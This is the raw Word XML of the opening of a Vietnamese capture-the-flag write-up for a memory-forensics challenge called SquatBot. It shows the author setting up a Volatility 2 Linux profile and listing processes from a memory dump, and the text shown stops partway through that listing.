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52BB" w14:textId="77777777" w:rsidR="00B70DDB" w:rsidRPr="00B70DDB" w:rsidRDefault="00B70DDB" w:rsidP="00B70DDB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B70DDB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Challenge SquatBot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE79FA7" w14:textId="77777777" w:rsidR="00B70DDB" w:rsidRPr="00B70DDB" w:rsidRDefault="00B70DDB" w:rsidP="00B70DDB">
      <w:r w:rsidRPr="00B70DDB">
        <w:t>Đầu vào challenge cung cấp 2 file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E4D410" w14:textId="77777777" w:rsidR="00B70DDB" w:rsidRPr="00B70DDB" w:rsidRDefault="00B70DDB" w:rsidP="00B70DDB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B70DDB">
        <w:t>dump.mem: file memory dump của máy Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A8302B" w14:textId="77777777" w:rsidR="00B70DDB" w:rsidRPr="00B70DDB" w:rsidRDefault="00B70DDB" w:rsidP="00B70DDB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B70DDB">
        <w:t>Ubuntu_4.15.0-184-generic_profile.zip: profile kernel Linux tương ứng với phiên bản 4.15.0-184-generic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464CD0F7" w14:textId="086145AD" w:rsidR="00B70DDB" w:rsidRPr="00B70DDB" w:rsidRDefault="00B70DDB" w:rsidP="00B70DDB">
      <w:r w:rsidRPr="00B70DDB">
        <w:t xml:space="preserve">Từ file dump.mem và Ubuntu_4.15.0-184-generic_profile.zip, có thể nghĩ ngay tới việc sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="00B70DDB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Volatility 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B70DDB">
        <w:t xml:space="preserve"> để điều tra. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4392F121" w14:textId="6113E22E" w:rsidR="00B70DDB" w:rsidRDefault="00B70DDB" w:rsidP="00B70DDB">
      <w:r w:rsidRPr="00B70DDB">
        <w:t xml:space="preserve">Trước tiên cần </w:t>
      </w:r>
      <w:r>
        <w:t>setup để</w:t>
      </w:r>
      <w:r w:rsidRPr="00B70DDB">
        <w:t xml:space="preserve"> Volatility 2 </w:t>
      </w:r>
      <w:r>
        <w:t>sử dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="00B70DDB">
        <w:t xml:space="preserve"> profile Ubuntu_4.15.0-184-generic_profile.zip mà challenge </w:t>
      </w:r>
      <w:r>
        <w:t>bằng cách đưa</w:t>
      </w:r>
      <w:r w:rsidRPr="00B70DDB">
        <w:t xml:space="preserve"> file profile vào thư mục volatility/plugins/overlays/linux/, sau đó kiểm tra Volatility 2 đã nhận profile bằng lệnh vol2 --info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FE77C4" w14:textId="21C8F928" w:rsidR="00B772CE" w:rsidRPr="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:r w:rsidRPr="00B772CE">
        <w:t xml:space="preserve">Bắt đầu điều tra, kiểm tra các </w:t>
      </w:r>
      <w:r>
        <w:t>process</w:t>
      </w:r>
      <w:r w:rsidRPr="00B772CE">
        <w:t xml:space="preserve"> hiện có trong memory dump bằng plugin linux_pstree.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CDCF06" w14:textId="7F56B1A6" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B70DDB">
      <w:r w:rsidRPr="00B772CE">
        <w:t>vol2 -f dump.mem --profile=LinuxUbuntu_4_15_0-184-generic_profilex64 linux_pstree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1530224D" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:r>
        <w:t>Name                 Pid             Uid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A098A5" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:r>
        <w:t>systemd              1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160CE662" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.systemd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-journal     432</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EEFB92" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.systemd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-udevd       449</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7635CBD4" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.lvmetad</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">             471</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D98246" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.systemd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-timesyn     628             62583</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B676D75" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.systemd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-network     725             100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DED38E" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.systemd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-resolve     742             101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2466D551" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.networkd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-dispat     819</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18123907" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.lxcfs</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">               820</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2288A7" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.atd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">                 823</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE1309A" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.cron</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">                836</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23127E28" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.accounts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-daemon     840</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177E81D3" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.rsyslogd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">            841             102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B474574" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>.dbus</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-daemon         851             103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2840701F" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.systemd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-logind      857</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1A2E34" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.sshd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">                863</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466B4BAB" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>sshd               1344</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D42C39A" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:r>
        <w:t>...sshd              1419            1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2556B4AD" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:r>
        <w:t>....bash             1420            1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5E2080" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:r>
        <w:t>.login               877</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58118532" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>bash               1295            1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332FBFEF" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:r>
        <w:t>...sudo              1342</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E2F576" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>....insmod</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">           1452</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EF8E34" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.polkitd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">             878</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2F2EAA" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.unattended</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-upgr     880</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1E1E6D" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.systemd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">             1273            1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A82204D" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(sd-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">pam)   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">        1274            1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1E089C" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.python</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>3             1451            1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243D0BF6" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">kthreadd]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">        2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55009430" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/0:0]       3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1241DBA5" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/0:0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">H]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">   4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0393F321" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/u2:0]      5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE2F694" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>mm_percpu_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">wq]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">   6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671A7171" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ksoftirqd/0]       7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7EE88B" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>rcu_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">sched]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">      8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAC1D4D" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>rcu_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">bh]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">         9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ECCFBE" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>migration/0]       10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEA6B6B" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>watchdog/0]        11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B278E9C" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>cpuhp/0]           12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7796CCFC" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">.[kdevtmpfs]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">      13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F42E956" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">.[netns]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">          14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FE89F1" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>rcu_tasks_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">kthre]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FECC93" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">.[kauditd]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">        16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FAFE24" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">.[khungtaskd]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">     17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F483A4" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>oom_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">reaper]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">     18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6B1F3D" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">.[writeback]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">      19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9A6051" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kcompactd0]        20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6DF8B1" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">.[ksmd]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">           21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EA5C1F" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">.[khugepaged]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">     22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DCBF1F" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">.[crypto]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">         23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9CC208" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">.[kintegrityd]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">    24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CC8879" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">.[kblockd]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">        25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059C3C17" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ata_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">sff]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">        26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B9DF53" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>md]                27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B949FE" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>edac-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">poller]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">    28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D58831F" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>devfreq_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">wq]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">     29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AAFAAD" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">.[watchdogd]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">      30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255FA474" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/u2:1]      31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6134B54E" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/0:1]       32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1C4FE5" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kswapd0]           34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F31E6DF" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/u3:0]      35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1872DB52" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ecryptfs-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">kthrea]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09549842" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">.[kthrotld]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">       78</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D61C9B0" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
